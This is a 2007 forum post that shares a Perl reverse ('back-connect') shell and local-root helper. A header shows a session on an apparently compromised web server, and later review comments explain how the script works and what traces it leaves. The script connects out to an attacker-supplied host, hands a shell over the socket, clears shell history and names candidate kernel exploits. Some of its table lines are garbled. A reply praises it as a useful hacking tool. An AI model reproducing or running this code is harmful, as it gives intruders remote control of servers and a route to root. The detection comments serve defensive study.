zbeng Posted June 24, 2007
#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# [email]3sk0rbut0@gmail.com[/email]
#
# Backconnect by data cha0s (modified by D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA
# ******* ConnectBack Shell *******
# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest
# Kernel local:
# 2.6.9-022stab078.14-smp
# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

# Reviewer summary of the listing below (line breaks restored; code tokens
# are as printed on the page):
#   1. Opens an outbound TCP connection to the host and port given on the
#      command line.
#   2. Duplicates that socket onto STDIN, STDOUT and STDERR, so everything the
#      script and its child processes read or write travels over the socket.
#   3. Runs a fixed host-survey command string, then compares `uname -r`
#      against a table of kernel version prefixes and prints the table keys
#      whose prefix matches.
#   4. Starts an interactive shell attached to the socket.
# Visible artifacts for detection: a perl process holding an outbound TCP
# socket on file descriptors 0-2, with shell children (the survey command,
# `uname -r`, `sh -i`, then /bin/bash) inheriting those descriptors. The
# header transcript above shows it running as the web server account
# (uid apache) out of a vhost document root.
# The script has no `use strict` / `use warnings`; $system is a package
# global.
use IO::Socket;
use Socket;
use FileHandle;
# Shell started by the last statement of the script.
$system = '/bin/bash';
# Usage text when no argument is given. Only $ARGV[0] is tested; a missing
# port ($ARGV[1]) is not caught here.
if(!$ARGV[0]) {
print "\nBackConnect Shell - D.O.M TEAM\n\n";
print "Usage: perl $0 [IPHOST] [NCPORT]\n";
print "Example: perl $0 82.85.55.21 6850\n\n";
exit;
}
# `die print "..."` evaluates print first: the message goes to STDOUT and die
# receives print's return value, so the text on STDERR is not the message.
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die print "[-] Protocolo Desconocido\n";
# Outbound connect to $ARGV[0] (address) on $ARGV[1] (port); the peer in the
# header transcript is a plain TCP listener.
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) || die print "[-] Error Socket\n";
# Status lines printed before the redirection below, i.e. to the local
# terminal or whatever STDOUT was at launch.
print "[+] BackConnect Shell\n";
print "[+] Conectando a $ARGV[0]... \n";
print "[+] Enviando Shell... \n";
print "[+] Conectado. 
\n";
SOCKET->autoflush();
# All three standard handles are re-opened as duplicates of the socket; the
# return values of open() are not checked. From here on `print` writes to the
# remote peer.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n******* ConnectBack Shell *******\n\n";
# One command string handed to the shell by system(): clears the HISTFILE and
# SAVEHIST variables, then prints kernel version, user, ids, logged-in users
# and working directory. The unset applies only to the shell spawned for this
# string. The literal string is a usable process-creation indicator when
# command-line auditing is enabled.
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");
# Rootkernel
# Kernel release of the local host, as reported by `uname -r`.
my $khost = `uname -r`;
chomp($khost);
print "\nKernel local: $khost\n\n";
# Table intended to map a name to a list of kernel version prefixes under the
# key 'vuln'.
# NOTE(review): `$hsd_'name'` is not hash-element syntax; these lines appear
# to have been mangled by the forum rendering. As printed they do not
# populate %h — confirm against an intact copy before relying on the table.
my %h;
$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };
$hsd_'elflbl' = { vuln=>['2.4.29'] };
$hsd_'elfdump' = { vuln=>['2.4.27'] };
$hsd_'expand_stack' = { vuln=>['2.4.29'] };
$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$hsd_'kdump' = { vuln=>['2.6.13'] };
$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };
$hsd_'krad' = { vuln=>['2.6.11'] };
$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };
$hsd_'local26' = { vuln=>['2.6.13'] };
$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };
$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };
$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace24' = { vuln=>['2.4.9'] };
$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };
$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$hsd_'remap' = { vuln=>['2.4.'] };
$hsd_'rip' = { vuln=>['2.2.'] };
$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };
$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$hsd_'newsmp' = { vuln=>['2.6.'] };
$hsd_'smpracer' = { vuln=>['2.4.29'] };
$hsd_'loginx' = { vuln=>['2.4.22'] };
$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$hsd_'prctl' = { vuln=>['2.6.'] };
$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };
# Old-style call with `&` and no parentheses, which passes the caller's
# current @_ through to the sub.
&busca;
# busca: for every key of %h, prints "P0sible 3xploit: <key>" once per listed
# prefix that matches the start of $khost. The prefix is interpolated into
# the regex unescaped, so each '.' matches any character and the test is a
# loose string-prefix comparison. A printed name therefore says only that
# the release string begins with a listed prefix; it does not establish the
# patch state of the running kernel.
# NOTE(review): `@sd_ $hsd_$key{'vuln' }` shows the same rendering damage as
# the table above.
sub busca {
foreach my $key(keys %h){
foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){
 if($khost=~/^$kernel/){
# Strips a trailing '.' from the prefix after the match; $kernel is not used
# again, so this does not change what is printed.
chop($kernel) if ($kernel=~/\.$/);
 print "P0sible 3xploit: ". $key ."\n";
 }
 }
 }
}
print "\n";
# Interactive `sh -i` with TERM set; it inherits the socket-backed standard
# handles, which matches the "no job control" message in the header
# transcript (no controlling terminal).
system 'export TERM=xterm;exec sh -i';
# Runs once the `sh -i` above has returned: starts $system (/bin/bash) on the
# same handles.
system($system);
Guest flama Posted June 25, 2007
foarte interesant ... cred ca ai greshit totushi sectziunea acesta fiind coltzul programatorilor ... shi cum nu tu ai programat ... mai potrivit era hack tools. iti sugerez sa il mutzi, sa iti dai warn shi sa iti tragi shi 2 palme peste fund. oricum e usefull toolu gg.